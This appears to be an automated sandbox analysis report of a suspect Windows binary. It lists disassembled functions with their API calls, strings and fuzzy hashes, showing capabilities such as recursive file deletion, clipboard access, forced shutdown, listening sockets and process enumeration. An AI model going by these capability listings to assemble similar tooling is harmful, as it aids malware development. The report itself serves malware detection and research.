                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 1946585618-1173974218
                                                  • Opcode ID: 44ca42f80ea1c761c4a1e71eda42b20f8192fc04abb34fdf5a97ea9dc9497f6c
                                                  • Instruction ID: 6783bd6b304ff164d99574831ef11bede3411081cc411e664ab579d9405ddabb
                                                  • Opcode Fuzzy Hash: 44ca42f80ea1c761c4a1e71eda42b20f8192fc04abb34fdf5a97ea9dc9497f6c
                                                  • Instruction Fuzzy Hash: 17615D3180110EAACF15EBE4CA969FDBF76BF95300F204169E501771A1EB396F09CBA1
                                                  Function 0060ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: 96dd50edf96378bc25f411caa3b0d96e87a9a0410e96464fd58d0f3f4a12a30d
                                                  • Instruction ID: 0753ed53f6d8324883067e11dc7da9453558c8d1126998b490fe8dab08bd7f9b
                                                  • Opcode Fuzzy Hash: 96dd50edf96378bc25f411caa3b0d96e87a9a0410e96464fd58d0f3f4a12a30d
                                                  • Instruction Fuzzy Hash: F8419D35244621AFD724DF15D888B5ABBE2FF44328F14C499E41A8B7A2C776FD42CB90
                                                  Function 005FE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                    • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                    • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 005FE932
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $ $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-3163812486
                                                  • Opcode ID: c3630f7a0f9538c7da452e057c408a039dd69601571eac77db35b541513ec28f
                                                  • Instruction ID: 3be501ff46d79050c84c8d81a418dc8b24136b192c0b063af859c344124f29dd
                                                  • Opcode Fuzzy Hash: c3630f7a0f9538c7da452e057c408a039dd69601571eac77db35b541513ec28f
                                                  • Instruction Fuzzy Hash: D4012632610619AFEB2427B49E8BFBF7A9CBB04751F150921FE02E20E1D9E85C4081B4
                                                  Function 00611204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00611276
                                                  • WSAGetLastError.WSOCK32 ref: 00611283
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006112BA
                                                  • WSAGetLastError.WSOCK32 ref: 006112C5
                                                  • closesocket.WSOCK32(00000000), ref: 006112F4
                                                  • listen.WSOCK32(00000000,00000005), ref: 00611303
                                                  • WSAGetLastError.WSOCK32 ref: 0061130D
                                                  • closesocket.WSOCK32(00000000), ref: 0061133C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                  • String ID:
                                                  • API String ID: 540024437-0
                                                  • Opcode ID: bf4a17383dedf66d349ca0a9d62c04e04cc0521acc7eac9be64bd99c30515a44
                                                  • Instruction ID: ca1b8ab333d3d98c2795dfc54df9dc6541546261de6052d2ea421c6a82430035
                                                  • Opcode Fuzzy Hash: bf4a17383dedf66d349ca0a9d62c04e04cc0521acc7eac9be64bd99c30515a44
                                                  • Instruction Fuzzy Hash: AA41A1316001419FD720DF24C498BA9BBE6BF86328F188088D9568F396C775EDC2CBE1
                                                  Function 005FD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005FD420
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD470
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD481
                                                  • FindClose.KERNEL32(00000000), ref: 005FD498
                                                  • FindClose.KERNEL32(00000000), ref: 005FD4A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: b0f5257f223a9c84d4c5144968f1283e97124d5097f3448649f00ee8d060ef95
                                                  • Instruction ID: 04c61d9618522cf42cac1e08368325f749b7f3836c8c0c6be1d33f274b27d0f5
                                                  • Opcode Fuzzy Hash: b0f5257f223a9c84d4c5144968f1283e97124d5097f3448649f00ee8d060ef95
                                                  • Instruction Fuzzy Hash: 40317E310083469BCB10EF64C8998BFBBB9BEE1314F444E1DF5D5931A1EB64AA09D763
                                                  Function 005CE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: e354a39282472bcf2c39c02edd687bd5e95d44c067151744710fd2cb1eef3f27
                                                  • Instruction ID: 823102a0df4885f89a926b5121e9718d67bb2c3f26840cb576208201c811164a
                                                  • Opcode Fuzzy Hash: e354a39282472bcf2c39c02edd687bd5e95d44c067151744710fd2cb1eef3f27
                                                  • Instruction Fuzzy Hash: 37C23871E046298FDB25CE689D45BEABBB6FB48304F1445EED40EE7241E774AE818F40
                                                  Function 0060648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 006064DC
                                                  • CoInitialize.OLE32(00000000), ref: 00606639
                                                  • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 00606650
                                                  • CoUninitialize.OLE32 ref: 006068D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                  • String ID: .lnk
                                                  • API String ID: 886957087-24824748
                                                  • Opcode ID: ee12270b9f02bc40badcf58e039b4623401e36c531a764180b4d509544e480c3
                                                  • Instruction ID: dbf7025d0777ede97ff56d8c982fc7507597d948ade19420997e49f7c857fad4
                                                  • Opcode Fuzzy Hash: ee12270b9f02bc40badcf58e039b4623401e36c531a764180b4d509544e480c3
                                                  • Instruction Fuzzy Hash: 43D14A715082029FC714EF24C8859ABBBE9FFD8704F40496DF5958B291EB71ED09CBA2
                                                  Function 006122DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 006122E8
                                                    • Part of subcall function 0060E4EC: GetWindowRect.USER32(?,?), ref: 0060E504
                                                  • GetDesktopWindow.USER32 ref: 00612312
                                                  • GetWindowRect.USER32(00000000), ref: 00612319
                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00612355
                                                  • GetCursorPos.USER32(?), ref: 00612381
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006123DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                  • String ID:
                                                  • API String ID: 2387181109-0
                                                  • Opcode ID: 128fff0826028b8e0b46187f067c004ce83f68351e74c7df3b30f56e7c1d50a8
                                                  • Instruction ID: 5b02b67ef57f0a59bcb80e65f8880f9bee8a188f5dc4d1cd69928b9a39878fdd
                                                  • Opcode Fuzzy Hash: 128fff0826028b8e0b46187f067c004ce83f68351e74c7df3b30f56e7c1d50a8
                                                  • Instruction Fuzzy Hash: E831E272504716AFC720DF14C849B9BBBAAFFC4310F040919F995A7291DB34EA59CBD2
                                                  Function 00609B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00609B78
                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00609C8B
                                                    • Part of subcall function 00603874: GetInputState.USER32 ref: 006038CB
                                                    • Part of subcall function 00603874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00609BA8
                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00609C75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                  • String ID: *.*
                                                  • API String ID: 1972594611-438819550
                                                  • Opcode ID: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
                                                  • Instruction ID: 0f2787616b7eb8970caad18489c4867f0ce3bbb276bebfb0b361c7cf9cba0f3f
                                                  • Opcode Fuzzy Hash: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
                                                  • Instruction Fuzzy Hash: 73414F7194460A9FDF18DF64C849AEFBBBAFF55310F244159E805A2291EB309E45CF60
                                                  Function 00598060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 14100214100a14100814100b14100514100514100f14100c14100514100214100f14100f1410091410051410081410081410001410001410001410001410001410$ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-2091794240
                                                  • Opcode ID: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
                                                  • Instruction ID: d1858e9d2966cd0bf040140332f1031adac44e773e6337853f188bc723f6a1ff
                                                  • Opcode Fuzzy Hash: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
                                                  • Instruction Fuzzy Hash: 60A26C75A0061ACBDF34CF58C8407BEBBB1BB55314F2485ABE815AB385EB349D85CB90
                                                  Function 005A997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 005A9A4E
                                                  • GetSysColor.USER32(0000000F), ref: 005A9B23
                                                  • SetBkColor.GDI32(?,00000000), ref: 005A9B36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$LongProcWindow
                                                  • String ID:
                                                  • API String ID: 3131106179-0
                                                  • Opcode ID: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
                                                  • Instruction ID: 56e44f7cd726ab21e4c73f14da11cb5141e8145d0e98fb9326d77b3262e18612
                                                  • Opcode Fuzzy Hash: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
                                                  • Instruction Fuzzy Hash: CCA118701084B8BFE72CAA3D9C48E7F2E9EFBCB344F14460AF542DA591CA259D01D676
                                                  Function 00611806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                    • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0061185D
                                                  • WSAGetLastError.WSOCK32 ref: 00611884
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006118DB
                                                  • WSAGetLastError.WSOCK32 ref: 006118E6
                                                  • closesocket.WSOCK32(00000000), ref: 00611915
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 1601658205-0
                                                  • Opcode ID: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
                                                  • Instruction ID: 2c59d74b4bf448e15a0930fbffced8ef56444ddb9ffe7b28ebd06b501ae4e13b
                                                  • Opcode Fuzzy Hash: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
                                                  • Instruction Fuzzy Hash: D651C671A002109FDB10AF24C88AF6E7BE6AB89718F08C458F9155F3D3D771ED428BA1
                                                  Function 00621C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
                                                  • Instruction ID: ed76665774a29b9cbace9124beb2c85e2998563261cb52c8b64998d7b953d7c4
                                                  • Opcode Fuzzy Hash: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
                                                  • Instruction Fuzzy Hash: 1121D635744A215FD7208F1AE854B6A7BE6FFA6324B198068E8458F351C775EC42CF90
                                                  Function 005F8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005F82AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($tbe$|
                                                  • API String ID: 1659193697-2251899736
                                                  • Opcode ID: 87c27a0497a307890cf47b7297536578b24e0a6d0da304c1b33fad1092702f89
                                                  • Instruction ID: f930b2a4645803332efc36b8ac4d6ce8f1427d64529d6677edb52d23c2480c63
                                                  • Opcode Fuzzy Hash: 87c27a0497a307890cf47b7297536578b24e0a6d0da304c1b33fad1092702f89
                                                  • Instruction Fuzzy Hash: 13323775A006059FCB28CF59C481A7ABBF0FF48710B15C96EE59ADB3A1EB74E941CB40
                                                  Function 0061A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0061A6AC
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0061A6BA
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0061A79C
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061A7AB
                                                    • Part of subcall function 005ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D3303,?), ref: 005ACE8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
